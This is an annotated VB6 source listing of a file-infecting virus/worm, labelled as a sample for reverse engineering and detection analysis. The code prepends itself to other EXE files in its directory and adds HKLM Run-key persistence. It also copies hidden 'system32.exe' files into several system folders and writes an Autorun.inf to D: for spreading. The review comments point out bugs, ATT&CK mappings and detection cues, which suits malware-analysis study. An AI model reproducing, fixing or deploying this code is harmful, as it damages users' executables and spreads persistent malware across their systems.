[程序代码] 感染 SYSTEM32 里的 EXE 文件 —— VB6 文件感染型病毒/蠕虫样本，仅供逆向与检测分析；请勿编译，也不要在隔离实验环境之外运行。

Option Explicit
' NOTE(review): this is a VB6 file-infecting virus / worm sample. It is kept
' here for analysis only; do not compile it or run it outside an isolated lab.
' The API imports below are what a reverse engineer would key on: process
' handle access (kernel32) and HKLM Run-key persistence (advapi32).
' File name of the current infection target, produced by Dir() in Form_Load.
Private Victim As String
' Declared but never used in this listing.
Private HostLen As Long
' Bytes of the running executable itself -- the payload prepended to victims.
Private vbArray() As Byte
' Bytes of the current victim (host) file.
Private hArray() As Byte
' Length of an appended host, computed in Form_Load (sic: "lenght").
Private lenght As Long
' Size of the running executable. Declared as a 16-bit Integer, so any LOF()
' above 32767 bytes raises Overflow (error 6), which Form_Load's On Error
' handler silently swallows.
Private MySize As Integer
' kernel32: used in Form_Load to poll the relaunched host until it exits.
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
' Declared but never called: the process handle opened in Form_Load is leaked.
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
' Unused in this listing.
Private iResult As Long
' Process handle returned by OpenProcess.
Private hProg As Long
' PID returned by Shell().
Private idProg As Long
' Exit code filled in by GetExitCodeProcess.
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
' Full access is requested although GetExitCodeProcess only needs
' PROCESS_QUERY_INFORMATION.
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
' advapi32: HKLM Run-key persistence in Form_Initialize. Writing under HKLM
' requires administrative rights.
Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
' Declared but never called: the key handle opened in Form_Initialize is leaked.
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1
Private Sub Form_Load()
' Infection routine; runs after Form_Initialize (the dropper / persistence
' part). Steps: spawn five "system32.exe" processes, read the running
' executable into vbArray, prepend it to every other *.exe in its own
' directory, then try to restore and run an appended host program.
' NOTE(review): every runtime error jumps to vbVerror, which is just End Sub,
' so any failure (overflow, sharing violation, short file, ...) silently
' aborts the remainder of the routine.
Dim i As Long
On Error GoTo vbVerror
'Kill "*.dll"
' Five parallel instances of the dropped copy. The bare name is presumably
' resolved through the working directory / PATH (the companion file beside
' the virus, or the copy already placed in %SystemRoot%\system32) -- confirm.
Shell "system32.exe"
Shell "system32.exe"
Shell "system32.exe"
Shell "system32.exe"
Shell "system32.exe"
' Read the running executable into vbArray (the infection payload).
' MyArray is not declared anywhere in this listing; under Option Explicit the
' ReDim below does not compile as posted.
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
As #1
ReDim MyArray(LOF(1) - 1)
' Integer assignment: Overflow (error 6) for files larger than 32767 bytes.
MySize = LOF(1)
' VB arrays default to lower bound 0, so this buffer is MySize+1 bytes: one
' byte longer than the file.
ReDim vbArray(MySize)
Get #1, 1, vbArray
Close #1

 

' Author's comment (translated): pick a file arbitrarily -- for now only from
' the directory the virus runs in; the author notes it could be changed to
' loop over every file on the machine. Targets are *.exe in App.Path only.
Victim = Dir(App.Path & "\" & "*.exe")
While Victim <> ""

' Skip the virus' own file (case-insensitive compare: Format ">" upper-cases).
If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then
Open App.Path & "\" & Victim For Binary Access Read As #1
ReDim hArray(LOF(1))
Get #1, 1, hArray
Close #1

 

' Byte 0x69 <> 'M' appears to act as an "already infected" marker; what places
' 'M' at that offset is not established by this listing -- TODO confirm.
' No length check: a file shorter than 0x6A bytes raises Subscript out of
' range here, which aborts the whole loop via vbVerror.
If hArray(&H69) <> &H4D Then

' Crude PE check: reads only the low byte of e_lfanew (the 4-byte header
' offset at 0x3C) and tests for the 'P' of "PE\0\0". Hosts with e_lfanew >=
' 0x100 are misjudged, and the "MZ" signature at offset 0 is never checked.
i = hArray(&H3C)
If hArray(i) = &H50 Then
' Prepending infection: the virus image is written first, then the host at
' 1-based position MySize. Since vbArray spans positions 1..MySize+1, the
' host's first two bytes overwrite the virus' last byte and its padding byte.
Open App.Path & "\" & Victim For Binary Access Write As #1
Put #1, , vbArray
Put #1, MySize, hArray
Close #1
End If
End If
End If


Victim = Dir()

Wend

 

' Host restoration. MySize was measured from this very file above, so unless
' the file changed in between LOF(1) - MySize is 0 here and the branch below
' is effectively dead: as written, an infected host never gets to run -- the
' process infects its neighbours and calls End.
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
lenght = LOF(1) - MySize
If lenght <> 0 Then
' Read the appended host (lenght bytes starting at 1-based position MySize)...
ReDim vbArray(lenght - 1)
Get #1, MySize, vbArray
Close #1

' ...and overwrite the running executable with it. Windows keeps an executing
' image locked against writes, so this Open is expected to fail with a sharing
' violation and jump to vbVerror -- TODO confirm on the target OS.
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Write As #1
Put #1, , vbArray
Close #1


' Launch the "restored" host and busy-wait (DoEvents) until it exits.
' PROCESS_ALL_ACCESS is more than GetExitCodeProcess needs, and hProg is never
' closed.
idProg = Shell(App.Path & "\" & App.EXEName & ".exe", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
' Self-delete attempt; expected to fail while this image is still executing.
Kill App.Path & "\" & App.EXEName & ".exe"

Else
Close #1

End If

' Terminates the process; the hidden form is never shown.
End

vbVerror:
End Sub
Private Sub Form_Initialize()
' Dropper + persistence. Fires when the form object is created, i.e. before
' Form_Load. Writes an HKLM Run-key entry (ATT&CK T1547.001), scatters copies
' named system32.exe over fixed paths, hides them with attrib, and plants an
' Autorun.inf on D: (removable-media style spread, cf. T1091).
' Detection hooks visible here: a process named system32.exe outside
' %SystemRoot%\system32, attrib.exe "+h +r" child processes, Autorun.inf
' written to a drive root, and the Run key's default value pointing at
' C:\WINDOWS\system32\system32.exe.
Form1.Hide
' Any error (no D: drive, access denied, missing companion file, ...) jumps
' to label 1 and leaves the remaining copies undone.
On Error GoTo 1:
Dim AAA As Long
' Opens/creates the Run key and sets its DEFAULT (unnamed) value; the handle
' is never closed. cbData is passed as 4 -- for REG_SZ RegSetValue is
' documented to compute the size itself, so presumably nothing is truncated;
' whether Run processing honours the unnamed value should also be confirmed.
' Writing under HKLM needs administrative rights.
RegCreateKey HKEY_LOCAL_MACHINE, "software\microsoft\windows\currentVersion\run\", AAA
RegSetValue AAA, vbNullString, REG_SZ, "C:\WINDOWS\system32\system32.exe", 4

' Already dropped? Then do nothing (the If branch is intentionally empty).
If Dir("C:\WINDOWS\system32\system32.exe") <> "" Then
Else
' The source is a companion "system32.exe" beside the running program;
' nothing in this listing creates it. Each copy is started right after it
' is written.
FileCopy App.Path & "\system32.exe", "C:\WINDOWS\system32\system32.exe"
Shell "C:\WINDOWS\system32\system32.exe"
FileCopy App.Path & "\system32.exe", "C:\system32.exe"
Shell "C:\system32.exe"
FileCopy App.Path & "\system32.exe", "D:\system32.exe"
FileCopy App.Path & "\system32.exe", "C:\Windows\system32.exe"
Shell "C:\Windows\system32.exe"
FileCopy App.Path & "\system32.exe", "C:\Program Files\Internet Explorer\system32.exe"
Shell "C:\Program Files\Internet Explorer\system32.exe"
FileCopy App.Path & "\system32.exe", "C:\Program Files\Windows Media Player\system32.exe"
Shell "C:\Program Files\Windows Media Player\system32.exe"
' Hidden + read-only via attrib.exe, spawned as separate child processes.
Shell "attrib +h +r C:\WINDOWS\system32\system32.exe", vbHide
Shell "attrib +h +r C:\system32.exe", vbHide
Shell "attrib +h +r D:\system32.exe", vbHide
' Autorun.inf on D: so the dropped copy runs when the drive is mounted or
' opened -- effective only where Autorun is enabled for that drive type.
Open "d:\Autorun.inf" For Output As #1
Print #1, "[autorun]"
Print #1, "open=system32.exe"
Close #1
Shell "attrib +h +r D:\Autorun.inf", vbHide
1:
End If
End Sub
